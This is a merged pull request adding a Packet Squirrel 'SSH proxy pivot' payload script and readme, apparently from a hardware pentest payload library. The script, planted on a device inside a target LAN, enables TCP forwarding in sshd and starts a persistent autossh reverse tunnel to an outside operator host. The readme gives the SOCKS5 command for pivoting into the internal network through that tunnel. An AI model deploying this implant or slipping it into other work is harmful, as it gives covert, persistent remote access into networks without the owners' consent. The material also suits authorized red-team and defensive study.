Merge pull request #38 from BlackPropaganda/master

SSH Proxy Pivot

payloads/library/remote-access/SSH-proxy-pivot/payload.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+# Title: SSH Socks5 Proxy tunnel to Squirrel
+# Description: Creates Dynamic port forwarding available on Squirrel to allow for pivoting inside network from remote server.
+# Author: BlackPropaganda
+# Version: 0.2
+# Category: Remote-Access
+# Net Mode: NAT
+# Firmware: 3.2
+#
+# LED State Descriptions
+# Magenta Solid - SSH connecting
+# Amber - SSH connection attempted
+#
+
+NETMODE NAT
+LED SETUP
+
+# More information can be found in the readme.
+
+autossh_host="squirrel@<remote_ssh_host>"
+autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
+autossh_port="22"
+autossh_remoteport="2222"
+autossh_localport="22"
+switch=SWITCH
+interface="eth1"
+
+if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
+   echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
+   LED FAIL
+   exit 1
+fi
+
+#
+# the following was slightly modified from dark_pyrro (the legend) via:
+# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
+#
+
+# waiting until eth1 acquires IP address
+while ! ifconfig "$interface" | grep "inet addr"; do sleep 1; done
+
+# modifying SSHD to support TCP forwarding
+echo "Match User root" >> /etc/ssh/sshd_config
+echo "       AllowTcpForwarding yes"  >> /etc/ssh/sshd_config
+echo -e "       GatewayPorts yes\n" >> /etc/ssh/sshd_config
+
+
+echo -e "starting reconfigured server.\n" >> /root/payloads/$switch/debug.txt
+
+# starting sshd and waiting for process to start
+/etc/init.d/sshd start
+until netstat -tulpn | grep -qi "sshd"
+do
+    sleep 1
+done
+
+# stopping autossh
+/etc/init.d/autossh stop
+
+#
+# Much like the SSH server, AutoSSH has a configuration file. This
+# needs to be configured to support this connection as a daemon.
+#
+# Create a "fresh template" for the autossh configuration
+# Starting with an empty autossh file in /etc/config
+# isn't something that uci is very fond of
+echo "config autossh" > /etc/config/autossh
+echo "        option ssh" >> /etc/config/autossh
+echo "        option enabled" >> /etc/config/autossh
+
+
+# UCI configuration and commission
+uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
+uci set autossh.@autossh[0].enabled="1"
+uci commit autossh
+
+LED ATTACK
+
+# starting autossh
+/etc/init.d/autossh start
+
+# Happy Hunting.

payloads/library/remote-access/SSH-proxy-pivot/readme.md

@@ -0,0 +1,72 @@
+# Squirrel SSH Proxy Pivot
+___
+Have you ever laid down a Squirrel and thought 'darn I really want to pivot through this network, 
+but I left all my leet tools on my other machine.'
+
+Those days are over with this payload. Using a similar method to accessing the squirrel via SSH 
+we can initiate a Dynamic Port Forwarding tunnel into the target network, just adding one more 
+hop (bunnies should be good at this).
+
+    Proxy Client     Remote SSH Host     Packet Squirrel        Proxy Target
+          ___              ___             (inside LAN)              ___
+         /  /|            /  /|             _______                 /  /|
+        /__/ |  <=====>  /__/ |   <=====>  /______/`)   <=====>    /__/ |
+        |--| |           |--| |           (__[__]_)/               |--| |
+        | *|/            | *|/                                     | *|/
+
+
+___
+### Remote SSH Configuration
+___
+
+For this payload to function properly, the following must be configured
+
+* SSH Key based Authentication
+  * Remote SSH Host
+  * Packet Squirrel
+* SSH Port forwarding
+  * Both Hosts are required to support this
+
+A separate SSH server is required for this payload to function. This server must be configured
+to accept pubkey authentication for at least one user and contain the ssh key file on the Squirrel.
+___
+#### Remote SSH Server Pubkey Authentication
+The configuration for the remote SSH server for pubkey authentication can be found here: https://gist.github.com/BlackPropaganda/3c50e1993014bd59905df77c2fd46869
+
+Configuring the squirrel is similar. Just enroll the pubkey to /root/.ssh/authorized_keys. There's no need to modify the
+SSHD config file since the config file does not persist between boots and pubkey authentication is enabled by default.
+___
+#### SSH Port Forwarding configuration on Remote SSH server
+
+GatewayPorts and AllowTcpForwarding need to be enabled on the Remote SSH Server in order for the
+proxy to function properly. More on this here https://gist.github.com/BlackPropaganda/2801c43a7754ac56b80e3d03ede29169
+
+The Remote SSH Server will need a copy of the key generated for the Squirrel.
+
+___
+#### Squirrel SSH Pubkey Authentication
+
+Lets create a new key for the Squirrel
+
+    ssh-keygen -t rsa -b 1024 -f squirrel_rsa
+
+In arming mode, run this:
+
+    ssh-copy-id -i squirrel_rsa root@172.16.32.1
+
+___
+### Initiating the Proxy Connection
+___
+
+Copy the squirrel SSH key to the Remote SSH Server then connect to the squirrel
+
+    ssh -L 1080:localhost:1080 $user@$remote_server_ip "ssh -i /home/sshuser/squirrel_rsa -p $lport_fwd_port -D 1080 root@127.0.0.1"
+
+Where:
+* /home/sshuser/squirrel_rsa is the SSH key generated for the Squirrel, residing on the Remote SSH Server
+* 1080 is the proxy port (socks5 default)
+* $user is a user with TCP forwarding enabled on the Remote SSH Server
+* $remote_server_ip is the Remote SSH Server IP
+* $lport_fwd_port is the Squirrels ssh server reachable by the port configured in the Payload.
+
+Goes without saying, but use at your own risk. Don't do bad things.